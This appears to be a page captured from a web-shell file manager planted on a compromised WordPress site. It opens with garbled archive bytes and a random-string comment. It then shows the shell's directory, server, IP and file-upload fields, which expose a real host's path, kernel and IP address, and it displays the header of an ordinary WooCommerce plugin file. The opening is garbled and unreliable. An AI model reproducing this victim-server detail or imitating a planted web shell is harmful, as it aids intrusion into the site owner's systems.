PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/sc1buiq6159/formagloba.fr/wp-content/plugins/oxyultimate-woo/
Server: Linux apophis.o2switch.net 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64
IP: 109.234.164.184
Choose File :

Url:
Dir : /home/sc1buiq6159/formagloba.fr/wp-content/plugins/oxyultimate-woo/oxyultimate-woo.php

<?php

/**
 * 3rd Party Addon for Oxygen Builder.
 * 
 * @wordpress-plugin
 * Plugin Name: 	OxyUltimate Woo
 * Plugin URI: 		https://www.oxyultimate.com
 * Description: 	Oxygen Components for WooCommerce
 * Author: 			Paul Chinmoy
 * Author URI: 		https://www.paulchinmoy.com
 *
 * Tested up to:    6.8.2
 * Version: 		1.5.13
 * WC tested up to: 10.2.2
 *
 * License: 		GPLv2 or later
 * License URI: 	http://www.gnu.org/licenses/gpl-2.0.html
 *
 * Text Domain: 	oxyultimate-woo
 * Domain Path: 	languages  
 */

/**
 * Copyright (c) 2025 Paul Chinmoy. All rights reserved.
 *
 * Released under the GPL license
 * http://www.opensource.org/licenses/gpl-license.php
 */

//* Prevent direct access to the plugin
if ( !defined( 'ABSPATH' ) ) {
	wp_die( __( "Sorry, you are not allowed to access this page directly.", 'oxyultimate-woo' ) );
}

require_once 'includes/class-ouwoo-loader.php';